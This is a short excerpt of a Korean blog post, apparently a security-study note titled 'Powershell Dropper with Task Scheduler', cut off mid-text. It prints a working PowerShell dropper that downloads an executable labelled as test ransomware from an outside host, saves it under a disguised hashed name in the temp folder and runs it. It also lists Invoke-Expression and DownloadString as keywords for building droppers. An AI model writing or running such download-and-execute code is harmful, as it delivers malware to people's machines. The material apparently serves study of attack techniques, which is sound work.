목록드랍퍼 (1)
-
[악성코드] Powershell Dropper with 작업 스케줄러
Notion 백업. Powershell Dropper 예제 $client = New-Object System.Net.WebClient $downloadURL = "http://bpsec.co.kr/~minibeef/download/nsr_test_ransomeware.exe" $path = ($env:TEMP) + "\18e190413af045db88dfbd29609eb877.exe" $client.DownloadFile($downloadURL, $path) cd $env:TEMP ./18e190413af045db88dfbd29609eb877.exe Powershell Dropper 만들 때 키워드 Invoke-Expression : 로컬에서 명령어 실행 DownloadString("") : 웹 사이트에..
Workspace
2020. 8. 12. 14:41